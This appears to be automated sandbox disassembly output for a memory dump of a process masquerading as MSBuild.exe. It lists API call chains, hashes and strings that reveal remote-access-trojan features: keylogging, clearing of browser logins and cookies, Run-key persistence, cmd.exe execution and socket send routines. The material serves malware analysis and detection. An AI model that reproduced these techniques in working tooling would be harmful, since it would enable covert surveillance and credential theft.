                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                APIs
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                • IsWindowVisible.USER32(?), ref: 004167A1
                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                • String ID: (FG
                                                • API String ID: 3142014140-2273637114
                                                • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                APIs
                                                • _strpbrk.LIBCMT ref: 0044D4A8
                                                • _free.LIBCMT ref: 0044D5C5
                                                  • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,00401962,?,?,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                  • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                  • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                • String ID: *?$.
                                                • API String ID: 2812119850-3972193922
                                                • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                APIs
                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                • String ID: XCG$`AG$>G
                                                • API String ID: 2334542088-2372832151
                                                • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 00442714
                                                • _free.LIBCMT ref: 004427DF
                                                • _free.LIBCMT ref: 004427E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                • API String ID: 2506810119-4083458154
                                                • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                • String ID: /sort "Visit Time" /stext "$8>G
                                                • API String ID: 368326130-2663660666
                                                • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                APIs
                                                • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread$LocalTimewsprintf
                                                • String ID: Offline Keylogger Started
                                                • API String ID: 465354869-4114347211
                                                • Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                • Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                APIs
                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread$LocalTime$wsprintf
                                                • String ID: Online Keylogger Started
                                                • API String ID: 112202259-1258561607
                                                • Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                • Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                APIs
                                                • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                • __dosmaperr.LIBCMT ref: 0044AAFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                • String ID: `@
                                                • API String ID: 2583163307-951712118
                                                • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 00404946
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                Strings
                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Create$EventLocalThreadTime
                                                • String ID: KeepAlive | Enabled | Timeout:
                                                • API String ID: 2532271599-1507639952
                                                • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CloseEventHandleObjectSingleWait
                                                • String ID: Connection Timeout
                                                • API String ID: 2055531096-499159329
                                                • Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                APIs
                                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,762337E0,?), ref: 004127AD
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,762337E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                • API String ID: 1818849710-1051519024
                                                • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                • String ID: bad locale name
                                                • API String ID: 3628047217-1405518554
                                                • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID: Control Panel\Desktop
                                                • API String ID: 1818849710-27424756
                                                • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID: TUF
                                                • API String ID: 1818849710-3431404234
                                                • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: /C $cmd.exe$open
                                                • API String ID: 587946157-3896048727
                                                • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                APIs
                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetLastInputInfo$User32.dll
                                                • API String ID: 2574300362-1519888992
                                                • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • API String ID: 1036877536-0
                                                • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                • API String ID: 3360349984-0
                                                • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                Strings
                                                • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                • API String ID: 3472027048-1236744412
                                                • Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                APIs
                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: CloseOpenQuerySleepValue
                                                • String ID: @CG$exepath$BG
                                                • API String ID: 4119054056-3221201242
                                                • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                APIs
                                                  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Window$SleepText$ForegroundLength
                                                • String ID: [ $ ]
                                                • API String ID: 3309952895-93608704
                                                • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                APIs
                                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandlePointerWrite
                                                • API String ID: 3604237281-0
                                                • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                APIs
                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Similarity
                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                • API String ID: 737400349-0
